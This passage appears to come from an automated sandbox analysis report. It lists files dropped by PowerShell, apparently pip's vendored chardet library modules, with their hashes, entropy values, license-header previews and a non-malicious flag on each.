                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12176
                                                                                                                                                                                                                              Entropy (8bit):4.553645559971779
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Kt17Q4Kds7lX6Fh1d+X+W5zJ2XvbeB/zXyr:Kt17Q4Kq743d4JJyk/y
                                                                                                                                                                                                                              MD5:695AACD84B4A71F9FB5BB34AC9C93F96
                                                                                                                                                                                                                              SHA1:E95356CAA14DFE77B88BDA324A212BD889C09365
                                                                                                                                                                                                                              SHA-256:02AC97A40D854050FB93E6EE06DCBFEE2B461189219956BC5F4F4D2D1BA5DD03
                                                                                                                                                                                                                              SHA-512:E8B2F398931268D66230B343FC072BC3E80923AC97871F9208F38C69527D64A917000359C22989C0EA867F38B53CF7BF780018C1D87E489294757F1E59637362
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3934
                                                                                                                                                                                                                              Entropy (8bit):4.726512990777819
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Kt17u4dC3gtnj6HmZoqEq+gZ/5xAiIIEpB:Kt17u4c3ej631Ec
                                                                                                                                                                                                                              MD5:D3202D07FA67B9CF567BAF644253DF04
                                                                                                                                                                                                                              SHA1:C140EE30BAF0BF8BB3E6682E252D60DED193156C
                                                                                                                                                                                                                              SHA-256:E4A61A33D7ECC64458CF0D5BE64D1F2FE8FFF9ECC8C3E8A3F6BF7B6BD307C4B6
                                                                                                                                                                                                                              SHA-512:E8919FB1E949FA6CAC403B6A2D344D25FA3CD05860C222DD5E75004215B72F2C5ED719319B68095C22EADC90EE2B06A63CCA62A83753001EA292DF02BBA0AE4C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13566
                                                                                                                                                                                                                              Entropy (8bit):4.078005344616192
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:kt17u4etdvXtmWt5mYt8EkFiTPJ1CTgEdCJz0ZUnYP+smG1tBLC/lGMwxpppHuQ:8u4EfQgJ8EkYTPJ+dtZggIG5L8G5RpHd
                                                                                                                                                                                                                              MD5:CA57ADF0FBEBE19B11F4B1E2E6F12285
                                                                                                                                                                                                                              SHA1:4E4B2666E277701D1D5F3C4A7B5DE3E63ABE4325
                                                                                                                                                                                                                              SHA-256:DE61EE46F5DFB2AFD0710CAC0D015BF2A4AE76F4E2A25EF50BA21CDB0E7BB4A3
                                                                                                                                                                                                                              SHA-512:06C1DB9C4F8D105079AD4F80E57B90A5B7B34E176904F00AC6FCDE5667C4858973C55E69BB89ECD0AC068094CE3CC928E8FC6CC924D3C1FAF32A5753CEDA73FD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1753
                                                                                                                                                                                                                              Entropy (8bit):4.986641051017726
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:Pixsiaiq5E807yRiyUVOkH/HqTbVB+HDsZRursBA7ayG:Kx/1ef0uwyUjHSEWIrsBlyG
                                                                                                                                                                                                                              MD5:D08847026CD3EC2909BFB9A1FB4B3128
                                                                                                                                                                                                                              SHA1:6DA6BE67B71017171A5979435E74F4E19B2B61AD
                                                                                                                                                                                                                              SHA-256:862153EB0335EF8188C11BEA0EC21CB8E73E743B2ADAE3CA30A6F257CFB55E77
                                                                                                                                                                                                                              SHA-512:B3EB464A55023B2F12AA72F76B31AA0A4C2ACF8982FB646026EA617DBF79AEA81A04088678E7B1DBAC57CA327F52E77441B7BF21CBFA707D03BD6DD490F16754
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):36913
                                                                                                                                                                                                                              Entropy (8bit):3.746878941919702
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:8u4btDNaiQu41FHrI7dBpvK6YRODCjc0arCC5KPI5ZTzoRtlxJ0NoFrXz+Al8Pan:8u4bswpuGHUR7LXzEFIJLdD0t9lWbV
                                                                                                                                                                                                                              MD5:9547E6B9F4943CB48B3D3B6AE1C431B4
                                                                                                                                                                                                                              SHA1:1CF53A3A7C2789211A5EDC4F6D9AAAB576707F8D
                                                                                                                                                                                                                              SHA-256:D9A9482C4D4B8797AA8852598F34643105E894D2511D8E6805077EBE66581453
                                                                                                                                                                                                                              SHA-512:6EFDBDA0BC74F1D354BA2007A124384A413A88C2D98151D78CB5DC26FE0240DFD53BE90C3EB8DCA752D6FE642E91AD9A57A425B7838B575C5EE4F63F396F67C8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1753
                                                                                                                                                                                                                              Entropy (8bit):4.987764155530606
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:Pixsiaiq5E807yRiyUVOkH/HqTbVB+HgZRuwZAXbayX+:Kx/1ef0uwyUjHS1IwZxyX+
                                                                                                                                                                                                                              MD5:544CFFDF446EDCCCA999925A7FF10B35
                                                                                                                                                                                                                              SHA1:7D51623EE0262400E4515524A145B51A41338833
                                                                                                                                                                                                                              SHA-256:3716E935D06D5345452346CA7C67C39293FB4B6FFCFFA1653BCEDD547D28830B
                                                                                                                                                                                                                              SHA-512:8A082F5BBAA60638A6EA8A122443B83B1BB988EAE68CF74E6978814223A43B8EE11D3C20027DA50509FE6CB6AC360E9D56006CFBD3CBA24FA5A2A5FE16BB9684
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20735
                                                                                                                                                                                                                              Entropy (8bit):3.939151729096338
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:8u4UgDMKZJsgZwUfIp3Gy/7IJaGDO4Pd6yFapYgEMke0eapNvVqI:8u4U8MwJhZwUfE3G3jDFapzEMOhVB
                                                                                                                                                                                                                              MD5:415A69CB07CE714A1BF632A0C3358DBA
                                                                                                                                                                                                                              SHA1:6BFB0B5839918D9C24497702E7BF858C3BA00261
                                                                                                                                                                                                                              SHA-256:E3D3AB757CC3F875EAC1ABE4AA3A3C67B82FB39F2138D3730E103230434D92F6
                                                                                                                                                                                                                              SHA-512:150723EB52002CBA5EAEE9997D9C94425D3A389C2E2579EB1B75F52ED9096A7370A6E0B8C62DF4C3D40A24FB54AE865F32D6881FC5C7C0AA8676C3A66B0843C4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1759
                                                                                                                                                                                                                              Entropy (8bit):5.003136709132374
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:Pixsiaiq5E807yRiyUVOkH/HqTbVB+HhZRuF+AXaqnn:Kx/1ef0uwyUjHS6IF+xwn
                                                                                                                                                                                                                              MD5:CC03FE034A4847134801AD8C5867DB1D
                                                                                                                                                                                                                              SHA1:30E241FBB864AEBF937FF633AAA6F866F17B40FE
                                                                                                                                                                                                                              SHA-256:28F101B9E6922D2BC1A4578834CBB40FA4E01DC47DD1EE4F6906B089FCC5E28D
                                                                                                                                                                                                                              SHA-512:D14E2AED6CD70C5B4AAC17BF2A75864F9FCE33D5511072E6305AC169B9EB97DC88899DF11C3B39604DCBFBA1ECEF6BA35918450D24EA1410E5D357508B558327
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14537
                                                                                                                                                                                                                              Entropy (8bit):4.719432840490389
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Ppf7u4/UcWpp0mOJBucQcy4z3l3mB3H1dS/egavTLDVxMFeuVnuK3jW:Bu4ccWppLIycl3mB3H1dSW/LbUW
                                                                                                                                                                                                                              MD5:6BCD08EDE49A7159AEEAAABFE69D8B05
                                                                                                                                                                                                                              SHA1:0E37161CE661E4839B7EB9A6DF772C2C4D69B073
                                                                                                                                                                                                                              SHA-256:F7A4FF2E3FCE996F9F2BB26B487A23623C86DDFB0681BCE4A13365799DE47D81
                                                                                                                                                                                                                              SHA-512:7B6C3312886DD5A00EEE46B33EA9906EF09E8B2273A48579E1107D7D18636F76FC45EAA1D0F435B1605C8FA4C64F6CEBA7CBC6D74FCBE896BB45040D93FB78D8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Shy Shalom.# Portions created by the Initial Developer are Copyright (C) 2005.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):25796
                                                                                                                                                                                                                              Entropy (8bit):3.9410992987964555
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:8u4j1Pw/tan6GGY/XTTd1SuqmsEn5nxo+1X:8YVanVGYf27E5nxo0
                                                                                                                                                                                                                              MD5:C27883193A26BC06B9DBE00915363EB5
                                                                                                                                                                                                                              SHA1:34B47699A27F4ABFC0F51D6D6C7381D7DB958BF0
                                                                                                                                                                                                                              SHA-256:9A6F2D7EBC2A86939DDF0CD9292E0D26A91805055C0DF4CCD89890E5A5BDDF61
                                                                                                                                                                                                                              SHA-512:C5AF3C8C97C70BCAC06CB3209DE0CCC1E8F45C5B84A3546F4792EC301AE1C5CF6355A68564064386D727DA18D64C95A5808C21BE6863905F3D2079F58DDAFF5B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):42498
                                                                                                                                                                                                                              Entropy (8bit):3.9703407677201956
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:8u4zRrv/1HCQ7s1D6bsSUWsah6utcS9EUoLhdpTW28HLSw+By7TvfgGvRizdPTFp:8olaK
                                                                                                                                                                                                                              MD5:DCDAEF14C3CE45E3434F59C603ABEF66
                                                                                                                                                                                                                              SHA1:F86E15CFE51BFE1104259580A9C4930F837E45D5
                                                                                                                                                                                                                              SHA-256:741A4E606DF81915FA48BF24FCB6D2F6BC593CC8CB8E8325819D373F3E479AA7
                                                                                                                                                                                                                              SHA-512:D95E3301216E4A577955844164C8A03E0DBF0E59863B28DF697DD89C0E7467953CEBF4CD6C0375967977F34FA77524947E466A87B6266ACC8FFB6888DA045FBD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1752
                                                                                                                                                                                                                              Entropy (8bit):4.991718392892598
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:Pixsiaiq5E807yRiyUVOkH/HqTbVB+HMZRuUVAjaJhG:Kx/1ef0uwyUjHSBIUVNLG
                                                                                                                                                                                                                              MD5:B75C19356BD2BCD1050A6D77E34F9B30
                                                                                                                                                                                                                              SHA1:997922FD9D2F7C25AD97A49127360CC7861AA9EE
                                                                                                                                                                                                                              SHA-256:3B5430F67573467BA7EEF669E1464CEF0BC94AFF56F78D66114F6E0CC9D8DC35
                                                                                                                                                                                                                              SHA-512:3734EE1484B4AFBB1D8B428A3137838282B91DCB9A9992DFDE9389FED2B9C53DA6134239FAB5657E188AAA5D3C5262370291E5608CCC26E07D373B1E3A54E414
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):27055
                                                                                                                                                                                                                              Entropy (8bit):3.402347675064911
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:vst17u4yPcG5myXGpMZc6O6zCeHzrTuT5mwXH/Dsof/NvVrC4Ia9svA1ajbUq30h:kt17u4yP+Oq6O8Zmn1SRAt5xO2
                                                                                                                                                                                                                              MD5:6DE3572A434870B145418698BB0FDD45
                                                                                                                                                                                                                              SHA1:09C4CCE0F373044F602189C098FC18B20D2C72F9
                                                                                                                                                                                                                              SHA-256:BA11EB61690BC44FEB1793A41CA2279B41D4B2B8E02871D542FB6DDD472FA2D0
                                                                                                                                                                                                                              SHA-512:E0E1077D92A04BF1EACE62F123A58F9EEAF0A2FB30A78EFDFD5A66676D78C8CD38D7A59218D1DCBFA3F49419D321F516596CAD273CFBFFEC6C2E744D2B508FE2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):104562
                                                                                                                                                                                                                              Entropy (8bit):3.2505168291988333
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:hWzg7jiE0QrPHa/mimSvsgMdA+TFxns0mDQIy7RfO3I8lVrzFWmNQZ5MuGSjiJx3:HMb
                                                                                                                                                                                                                              MD5:DE325C59680B77A01F39407162C6195A
                                                                                                                                                                                                                              SHA1:EEEF1BFBE316FA01DB8842C0A01875A8E30B03A9
                                                                                                                                                                                                                              SHA-256:BE66EF6053FC499912C6806F2E416A2A21F5B2399AE62864DCF4E9772EF546BE
                                                                                                                                                                                                                              SHA-512:4C341967A56C4F04ECD1D9F91A21568DE614E76D3EF8910E075CFA324B1AFB2BFB419D0E2B48B3557D594DE4C8A96F288D6C1E49DB935F6FA6C06C5C39620974
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from pip._vendor.chardet.sbcharsetprober import SingleByteCharSetModel..# 3: Positive.# 2: Likely.# 1: Unlikely.# 0: Negative..BULGARIAN_LANG_MODEL = {. 63: { # 'e'. 63: 1, # 'e'. 45: 0, # '\xad'. 31: 0, # '.'. 32: 0, # '.'. 35: 0, # '.'. 43: 0, # '.'. 37: 0, # '.'. 44: 0, # '.'. 55: 0, # '.'. 47: 0, # '.'. 40: 0, # '.'. 59: 0, # '.'. 33: 0, # '.'. 46: 0, # '.'. 38: 0, # '.'. 36: 0, # '.'. 41: 0, # '.'. 30: 0, # '.'. 39: 0, # '.'. 28: 0, # '.'. 34: 0, # '.'. 51: 0, # '.'. 48: 0, # '.'. 49: 0, # '.'. 53: 0, # '.'. 50: 0, # '.'. 54: 0, # '.'. 57: 0, # '.'. 61: 0, # '.'. 60: 0, # '.'. 56: 0, # '.'. 1: 0, # '.'. 18: 1, # '.'. 9: 1, # '.'. 20: 1, # '.'. 11: 1, # '.'.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):98484
                                                                                                                                                                                                                              Entropy (8bit):3.234136994027915
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:s2I3Miw2Aa0VG426bvLkhVcwciD+v+BfChi0Qf2nbO4WeGfjvecIxZcdXcAxDitU:YZ5
                                                                                                                                                                                                                              MD5:99499EDF6AED8D118AD2F8A1E4980CB7
                                                                                                                                                                                                                              SHA1:4CC952EDA440D1A4BA59DC62F814910175819565
                                                                                                                                                                                                                              SHA-256:25F07B6EEA638C91F6C375FF9989D0AFD70903FEC4B884C2D9C456D777D48DE2
                                                                                                                                                                                                                              SHA-512:80C1F3D8CB8BC0192DFC923BF68019AFDF32772CC38CDBCE34B77A52EDD231B0D53F315674001B3398AA00A57491017364D88A02E0F762DBD22DF7EF4F27EFF3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from pip._vendor.chardet.sbcharsetprober import SingleByteCharSetModel..# 3: Positive.# 2: Likely.# 1: Unlikely.# 0: Negative..GREEK_LANG_MODEL = {. 60: { # 'e'. 60: 2, # 'e'. 55: 1, # 'o'. 58: 2, # 't'. 36: 1, # '.'. 61: 0, # '.'. 46: 0, # '.'. 54: 0, # '.'. 31: 0, # '.'. 51: 0, # '.'. 43: 0, # '.'. 41: 0, # '.'. 34: 0, # '.'. 40: 0, # '.'. 52: 0, # '.'. 47: 0, # '.'. 44: 0, # '.'. 53: 0, # '.'. 38: 0, # '.'. 49: 0, # '.'. 59: 0, # '.'. 39: 0, # '.'. 35: 0, # '.'. 48: 0, # '.'. 37: 0, # '.'. 33: 0, # '.'. 45: 0, # '.'. 56: 0, # '.'. 50: 1, # '.'. 57: 0, # '.'. 17: 0, # '.'. 18: 0, # '.'. 22: 0, # '.'. 15: 0, # '.'. 1: 0, # '.'. 29: 0, # '.'. 20: 0, # '.'. 21:
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):98196
                                                                                                                                                                                                                              Entropy (8bit):3.1838824330599587
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:5+xq/jLobEVWpt/ntjhejcQxmmLcRBi0k91FPWTXpPBMA3WzcboML7DmHlCkXMle:5+xq/jLobEVWpt/ntjhejcQxmmLcRBiZ
                                                                                                                                                                                                                              MD5:8091A0C9B0FC2517DC091DA87A8D9A74
